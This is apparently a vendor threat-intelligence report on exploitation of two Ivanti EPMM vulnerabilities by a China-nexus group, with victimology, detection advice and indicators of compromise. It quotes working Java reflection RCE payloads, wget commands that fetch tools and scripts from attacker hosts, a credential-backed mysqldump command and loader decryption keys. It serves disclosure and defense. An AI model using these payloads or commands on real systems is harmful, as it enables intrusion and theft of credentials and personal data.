Executive Summary 

On Thursday, May 15, 2025, Ivanti disclosed two critical vulnerabilities - CVE-2025-4427 and CVE-2025-4428 - affecting Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0 and earlier. [1] These vulnerabilities can be chained to achieve unauthenticated remote code execution (RCE) on exposed systems.  

EclecticIQ analysts observed active exploitation of this vulnerability chain in the wild, targeting internet-facing Ivanti EPMM deployments. The earliest observed exploitation activity dates back to May 15, 2025. Targeted organizations span critical sectors including healthcare, telecommunications, aviation, municipal government, finance, and defense across Europe, North America, and the Asia-Pacific region.

Figure 1- EclecticIQ graph view showing activates of Ivanti EPMM intrusions.

Based on the tactics, techniques, and procedures (TTPs) observed, EclecticIQ attributes this activity with high confidence to UNC5221 [2], a China-nexus espionage group previously linked to zero-day exploitation of edge network appliances since at least 2023 [3]. 

UNC5221 demonstrates a deep understanding of EPMM’s internal architecture, repurposing legitimate system components for covert data exfiltration. This includes the extraction of large volumes of personally identifiable information (PII), authentication credentials, and other sensitive data used for lateral movement within compromised environments. 

Given EPMM's role in managing and pushing configurations to enterprise mobile devices, a successful exploitation could allow threat actors to remotely access, manipulate, or compromise thousands of managed devices across an organization. 

Ivanti has released patches addressing both vulnerabilities, and customers are strongly urged to follow the guidance outlined in the official security advisory to secure their environments as soon as possible. 

Initial Compromise via Unauthenticated RCE Exploit 

EclecticIQ analysts observed that threat actors gained initial access by exploiting an unauthenticated RCE vulnerability in Ivanti EPMM deployments. The exploitation targeted the /mifs/rs/api/v2/ endpoint, where the ?format= parameter was used to send malicious remote commands.  

Figure 2- Base64-encoded payload embedded in a GET request 

 Threat actors use HTTP GET requests, containing Java-based commands. These requests are designed to execute external malicious processes on compromised systems: 

• • ${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec("REMOTE-COMMAND").waitFor()}

This command leverages Java Reflection to invoke Runtime.getRuntime().exec(), enabling arbitrary command execution. The use of .waitFor() ensures that the Java thread remains active until the external process completes.   

Figure 3, showing example command sent to vulnerable Ivanti EPMM instances to gain interactive reverse shell, where.waitFor() used to avoid terminating the thread and continue to communication channel between the attacker and the victim system. 

Figure 3- Java payload spawning a reverse shell to 64.52.80[.]21:4444 using /bin/bash 

Additionally, the threat actor used another reflective Java expression to read the executed remote command output coming from the victim system:  

• ${"".getClass().forName("java.util.Scanner").getConstructor("".getClass().forName("java.io.InputStream")).newInstance("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec("REMOTE-COMMAND").getInputStream()).useDelimiter("\\A").next()}

This expression constructs a Scanner to read the InputStream of the executed process, allowing the attacker to capture the command's output. 

By chaining these techniques, the threat actor was able to execute malicious commands and immediately retrieve their results, forming a reliable command-and-control (C2) mechanism using server-side Java injection. 

KrustyLoader for Persistence Remote Access 

EclecticIQ analysts observed the execution of KrustyLoader [4] malware within compromised Ivanti EPMM systems. Threat actors associated with the UNC5221 group exploited these systems and utilized publicly accessible Amazon AWS S3 buckets to deliver final payloads.  

Threat actors used built-in Linux utilities such as wget, curl, and fetch to download a malicious payload, save it to the /tmp/1 directory, and execute it to gain persistence access of the target environment. 

Figure 4 - Obfuscated Bash script downloading and executing a payload from an AWS S3 URL using wget, curl, or fetch, followed by permission change and execution. 

 AWS S3 Buckets Abused to Deliver KrustyLoader: 

• openrbf.s3.amazonaws.com 

• tnegadge.s3.amazonaws.com 

• fconnect.s3.amazonaws.com 

• trkbucket.s3.amazonaws.com 

• the-mentor.s3.amazonaws.com 

• tkshopqd.s3.amazonaws.com 

Once installed, KrustyLoader retrieves a second-stage payload — an AES-128-CFB encrypted version of the Sliver backdoor [5]. It then decrypts this payload using a hardcoded key and initialization vector, and injects it directly into memory as shellcode, allowing threat actors to establish persistent remote access on the compromised system. 

Figure 5 - Embedded ciphertext within a binary file. 

KrustyLoader embeds an encrypted URL pointing to the actual backdoor, which is a Sliver C2 implant. The embedded URL is hidden within the binary as a hex string, then XOR encrypted (key: 0x49), and finally encrypted using AES-128 in CFB mode with a hardcoded key and IV.  

Figure 6 - Decryption process revealing malicious URL. Using CyberChef with Hex decoding, XOR with 0x49, and AES decryption (CFB mode) with a specified key and IV. 

In one of the analysed samples, the decryption revealed the staging URL:  

• http://abbeglasses.s3.amazonaws[.]com/dSn9tM 

The loader downloads this file, which is itself an AES-encrypted ELF binary, and decrypts it using the same AES key (95cd9006ca055abae4f87563cfb0fb0b) and initialization vector (2c210dd19e392409567546d06e676070).  

The resulting payload is loaded directly into memory and executed as shellcode - enabling covert, persistent remote access for the threat actor, even after patching of the original vulnerabilities on the host system. 

Hardcoded MySQL Credentials in Ivanti EPMM Abused to Exfiltrate Sensitive Data  

EclecticIQ analysts observed that the mifs database is a primary target for espionage and data exfiltration operations by China-nexus actors. After initial compromise, threat actors leveraged hardcoded MySQL database credentials stored in /mi/files/system/.mifpp to access the backend mifs database in Ivanti EPMM systems [6] .  

Figure 7 - Directory listing reveals sensitive configuration and credential files (e.g., .mifpp, .spp2, .mrpp) with hardcoded usernames and passwords. 

This database holds core operational data for Ivanti EPMM. Unauthorized access to the mifs database gives threat actors visibility into managed mobile devices (including IMEI, phone numbers, location, SIM details etc.), LDAP users, and Office 365 refresh and access tokens. 

The below command was executed on compromised Ivanti EPMM systems to export LDAP server details and very likely leveraged for active directory reconnaissance: 

• /usr/bin/mysqldump --defaults-extra-file=/mi/files/system/.mifpp mifs mifs_ldap_server_config 

• • mi_user 

• • mifs_ldap_users 

In some incidents, threat actors issued scripted SQL queries to automate these steps by downloading a bash script from dpaste[.]com and drop it under /tmp/h or /tmp/y for final execution.  

The command below was observed inside multiple compromised system to download that script by abusing wget command: 

• wget https://dpaste[.]com/9MQEJ6VYR.txt -O /tmp/h 

The Bash script was executed to dump Office 365 integration tokens and credentials from the office365_credentials table, which could be used by threat actor to gain unauthorized access to Microsoft Azure Entra ID services, including Office 365 emails and SharePoint cloud storage.  

Threat actors also exfiltrated metadata inside managed mobile devices by dumping the mi_device_detail table; this data likely supports China-nexus cyber espionage operations for targeting high-value individuals within public institutions, including government agencies, or in the private sector. 

Figure 8 - Script extracts heap dumps of Tomcat Java processes and searches for LDAP credentials by combining jcmd, mysqldump, and string. 

Threat actors dumped heap memory from Tomcat Java processes using jcmd, then parsed the dumped data. These memory artifacts were stored under /tmp, for staging the final exfiltration phase.   

EclecticIQ analysts observed the installation of FRP (Fast Reverse Proxy) [7], an open-source reverse proxy tool frequently leveraged by China-nexus associated threat actors [8].  

In the Ivanti EPMM intrusions, threat actors executed a remote command that used the following command to download a FRP binary from the attacker-controlled IP address (103.244.88[.]125) and drop it in the local path /tmp/.alog on the compromised host. 

• wget http://103.244.88[.]125:8080/frpc -o /tmp/.alog 

Figure 9 - Log entry showing remote code execution via a vulnerable format parameter. 

Once deployed, FRP enables the attacker to establish a reverse SOCKS5 proxy, providing persistent access to the internal network. From this foothold, threat actors can conduct network reconnaissance using tools such as Nmap, just like they were operating physically inside the internal environment. This capability is typically followed by lateral movement to other internal systems, enabling broader access and deeper compromise of the network. 

Reconnaissance and Staging Activity Observed in Ivanti EPMM Exploitation  

During analysis of access logs from compromised Ivanti EPMM instance, EclecticIQ analysts observed that threat actors conducting host reconnaissance using obfuscated shell commands.  

Following the reconnaissance phase, the actor issued commands to download and execute a KrustyLoader payload from AWS S3 bucket, that was likely compromised by threat actor (tkshopqd.s3.amazonaws.com). This binary - retrieved via multiple methods (wget, curl, fetch) then saved to /tmp/1, changed the file type as executable, and then launched on system.  

The attackers first executed a sequence of commands via sh -c $@|bash 0, writing the output of various system enumeration commands to fake JPG files within the web-accessible directory, a likely attempt to evade detection by security tools and human analysts:  

• /mi/tomcat/webapps/mifs/images/ 

Figure 10 - KrustyLoader malware installation via Bash commands, capturing system reconnaissance output to .jpg files and downloading a payload from an AWS S3 bucket to /tmp/1. 

Examples of executed commands include: 

• whoami, id, hostname, uname -a 

• Accessing sensitive files like /etc/passwd, /etc/shadow, /etc/hosts, /etc/resolv.conf 

• Listing directory contents of /opt, /mnt, /var 

• Dumping user and system activity via last -n 30, ps -ef, crontab -l, and ~/.bash_history 

• Network enumeration with ip add and netstat -tenp 

The actor saved each output temporarily as a file (e.g., whoami > /mi/tomcat/webapps/mifs/images/Hq8weo.jpg) and then immediately deleted it using rm -rf. This pattern suggests the actor was retrieving host-level intelligence in real time, potentially using HTTP GET requests to exfiltrate the data before wiping the artifacts. 

China-Nexus Attribution Confidence and Historical Context  

EclecticIQ assesses with high confidence that the observed Ivanti EPMM exploitation activity is very likely linked to UNC5221, a China-nexus cyber-espionage group. Infrastructure reuse and observed tradecraft closely align with previous campaigns attributed to this actor.

EclecticIQ analysts identified that the IP address 27.25.148[.]183, hosted in China, was previously used in SAP NetWeaver exploitation campaigns  [9] attributed to UNC5221 in early May 2025. Threat actors reused the same infrastructure in the Ivanti EPMM intrusion. Post-exploitation logs show this IP was used to download and execute malicious Bash scripts and to establish a reverse shell over TCP port 5666. 

Figure 11 - Log entries showing remote code execution attempts via vulnerable format parameters to download (curl) and execute a shell script (dl.sh), followed by a reverse shell to attacker IP 27.25.148.183 on port 5666. 

 The reuse of infrastructure and consistent exploitation tradecraft strongly indicates continuity in UNC5221's operations. The group is known for targeting internet-facing enterprise applications and leveraging them for initial access and persistent footholds, consistent with observed patterns in the Ivanti EPMM intrusion. 

Auto-Color Backdoor C2 Observed in Ivanti EPMM Intrusions 

In addition, analysts observed a likely link to Auto-Color, a Linux backdoor first reported by Palo Alto Networks in late 2024. [10]  

The IP address http://146.70.87.67:45020, previously associated with Auto-Color command-and-control infrastructure, was seen issuing outbound connectivity tests via curl immediately after exploitation of Ivanti EPMM servers. This behaviour is consistent with Auto-Color's staging and beaconing patterns. Taken together, these indicators very likely links China-nexus activity. 

 Victimology of Ivanti EPMM Intrusions 

Intrusions targeting Ivanti EPMM show a global pattern, with threat actors linked to China breaching organizations across diverse industries and regions. 

Affected sectors include: 

• Municipal governance agency in a major Scandinavian capital. 

• Local government authority in the United Kingdom. 

• UK-based healthcare trust providing hospital and clinical services in London. 

• UK healthcare institution involved in national health service operations. 

• Federal research institute in Germany specializing in agricultural and plant science. 

• German legal and insurance services firm offering protection products. 

• Largest German telecommunications provider and its managed IT service subsidiaries. 

• German manufacturer specializing in industrial rotary technology. 

• Irish-based aerospace leasing company serving global airline clients. 

• National healthcare and pharmaceutical provider focused on long-term care services. 

• U.S. medical device manufacturer specializing in vascular access and oncology products. 

• Major foodservice distributor catering to restaurants and retail operations. 

• U.S. transportation infrastructure entity managing airport systems in Houston. 

• Cybersecurity firm specializing in mobile threat defense and enterprise device security. 

• U.S.-based firearms manufacturer serving both civilian and defense markets. 

• Multinational bank operating in South Korea, with a strong presence in commercial and consumer financial services. 

• Japanese automotive parts supplier known for advanced electronics and powertrain systems. 

Due to the nature of the Ivanti Endpoint Manager Mobile (EPMM) platform—which centrally manages mobile devices within enterprise or government environments—the compromise of these systems exposes a rich set of sensitive data. This includes real-time device telemetry, IMEIs, phone numbers, authentication tokens, LDAP mappings, and access credentials tied to Microsoft 365 and enterprise identity providers. 

EclecticIQ analysts assess that the Ivanti EPMM intrusion by UNC5221 reflects the strategic intent of China-nexus actors to likely repurpose exfiltrated data in support of state-aligned cyber-enabled espionage objectives, targeting high-value individuals and institutional assets to advance the intelligence-gathering priorities of the People's Republic of China (PRC). 

Detection Strategies 

In Ivanti Endpoint Manager Mobile (EPMM), HTTP request logs are stored in: 

• /mi/tomcat/logs/access-logs.* 

These are Tomcat access logs that record all HTTP traffic processed by the EPMM server and are critical for detecting web-based attacks, including remote code execution (RCE) attempts. 

Regex-Based Detection for Remote Code Execution: 

To identify suspicious Java-based remote command execution attempts via the format parameter, use the following regular expression to search within access logs: 

• format=.*?exec(?:%28|\()(['"]|%27)(.+?)\1 

This pattern matches attempts to invoke Java’s Runtime.exec() using reflection techniques commonly seen in RCE payloads. 

File System Monitoring for Suspicious File Activity 

Monitor high-risk directories for Unauthorized file uploads, executable drops or unusual script activity 

Directories to watch: 

• /tmp/ 

• /var/tmp/ 

• /mi/tomcat/webapps/mifs/images/ 

Detection Tips: 

• Monitor for binaries or scripts being executed directly from these directories. 

• Alert on common Linux tools used for downloading malicious files: 

• wget, curl, fetch 

Example suspicious command pattern: 

• wget http://malicious[.]domain/payload -O /tmp/<filename> 

Log and Alert Recommendations 

• Ingest and parse access logs and process creation logs in your SIEM/XDR platform. 

• Set alerts for: 

• Use of suspicious parameters in HTTP requests (?format= followed by encoded commands) 

• File creations in /tmp or /var/tmp by web service processes (e.g., Tomcat, Java) 

• Execution of binaries from these directories 

Indicator of Compromise (IOCs) 

IP Addresses 

• 103.244.88[.]125 – Used to host and deliver the FRP (Fast Reverse Proxy) binary. 

• 27.25.148[.]183 – Hosted in China, reused from prior SAP NetWeaver exploitation campaigns attributed to UNC5221. 

• 146.70.87[.]67:45020 – Associated with Auto-Color Linux backdoor command-and-control infrastructure. 

• 124.223.202[.]90 – Hosted in China (Tencent Cloud); serves as the backend for the Yak Bridge service used to receive DNS callback traffic via ns1.cybertunnel[.]run.  

KrustyLoader Samples 

• 44c4a0d1826369993d1a2c4fcc00a86bf45723342cfd9f3a8b44b673eee6733a 

• 7a4e0eb5fbab9709c8f42beb322a5dfefbc4ec5f914938a8862f8e26a31d30a5 

• f34db4ea8ec3c2cbe53fde3d73229ccaa2a9e7168cd96d9a49bf89adef5ab47c 

• 150ccd3b24a1b40630e46300100a3f810aa7a6badeb6806b59ed6ba7bafb7b21 

Decrypted Sliver C2 Sample from KrustyLoader 

• 29ae4fa86329bf6d0955020319b618d4c183d433830187b80979d392bf159768 

Linux Bash Script Used to Dump MySQL Database 

• 64764ffe4b1e4fc5b9fe27b513e02f0392f659c4e033d23a4ba7a3b7f20c6d30 

• b422645db18e95aa0b4daaf5277417b73322bed306f42385ecfd6d49be26bfab 

Malicious Domains 

Used to deliver KrustyLoader payloads: 

• openrbf.s3.amazonaws[.]com 

• tnegadge.s3.amazonaws[.]com 

• fconnect.s3.amazonaws[.]com 

• trkbucket.s3.amazonaws[.]com 

• the-mentor.s3.amazonaws[.]com 

• tkshopqd.s3.amazonaws[.]com 

Staging URL for encrypted Sliver backdoor: 

• http://abbeglasses.s3.amazonaws[.]com/dSn9tM 

Pastebin-style hosting for malicious script: 

• https://dpaste[.]com/9MQEJ6VYR.txt 

Used to verify successful RCE via DNS callback: 

• ns1.cybertunnel[.]run - Functions as a nameserver (NS) for the dnstunnel[.]run DNSLog system, used in DNS tunnelling operations associated with the Yaklang/Yakit toolset. 

MITRE ATT&CK Matrix 

References 

[1] “Security Advisory Ivanti Endpoint Manager Mobile (EPMM) May 2025 (CVE-2025-4427 and CVE-2025-4428).” Accessed: May 19, 2025. [Online]. Available: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM?language=en_US

[2] “UNC5221, UTA0178 - Threat Group Cards: A Threat Actor Encyclopedia.” Accessed: May 20, 2025. [Online]. Available: https://apt.etda.or.th/cgi-bin/showcard.cgi?g=UNC5221%2C%20UTA0178&n=1 

[3] “Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457),” Google Cloud Blog. Accessed: May 21, 2025. [Online]. Available: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability

[4] “KrustyLoader (Malware Family).” Accessed: May 19, 2025. [Online]. Available: https://malpedia.caad.fkie.fraunhofer.de/details/elf.krustyloader

[5] BishopFox/sliver. (May 21, 2025). Go. Bishop Fox. Accessed: May 21, 2025. [Online]. Available: https://github.com/BishopFox/sliver

[6] M. Elyassa, “Red teaming like an APT, a MobileIron 0-day exploit chain”. 

[7] fatedier, fatedier/frp. (May 21, 2025). Go. Accessed: May 21, 2025. [Online]. Available: https://github.com/fatedier/frp

[8] “Chinese Threat Actor Used Modified Cobalt Strike Variant to Attack Taiwanese Critical Infrastructure.” Accessed: May 21, 2025. [Online]. Available: https://blog.eclecticiq.com/chinese-threat-actor-used-modified-cobalt-strike-variant-to-attack-taiwanese-critical-infrastructure

[9] “China-Nexus Nation State Actors Exploit SAP NetWeaver (CVE-2025-31324) to Target Critical Infrastructures.” Accessed: May 19, 2025. [Online]. Available: https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures

[10] A. Armstrong, “Auto-Color: An Emerging and Evasive Linux Backdoor,” Unit 42. Accessed: May 20, 2025. [Online]. Available: https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/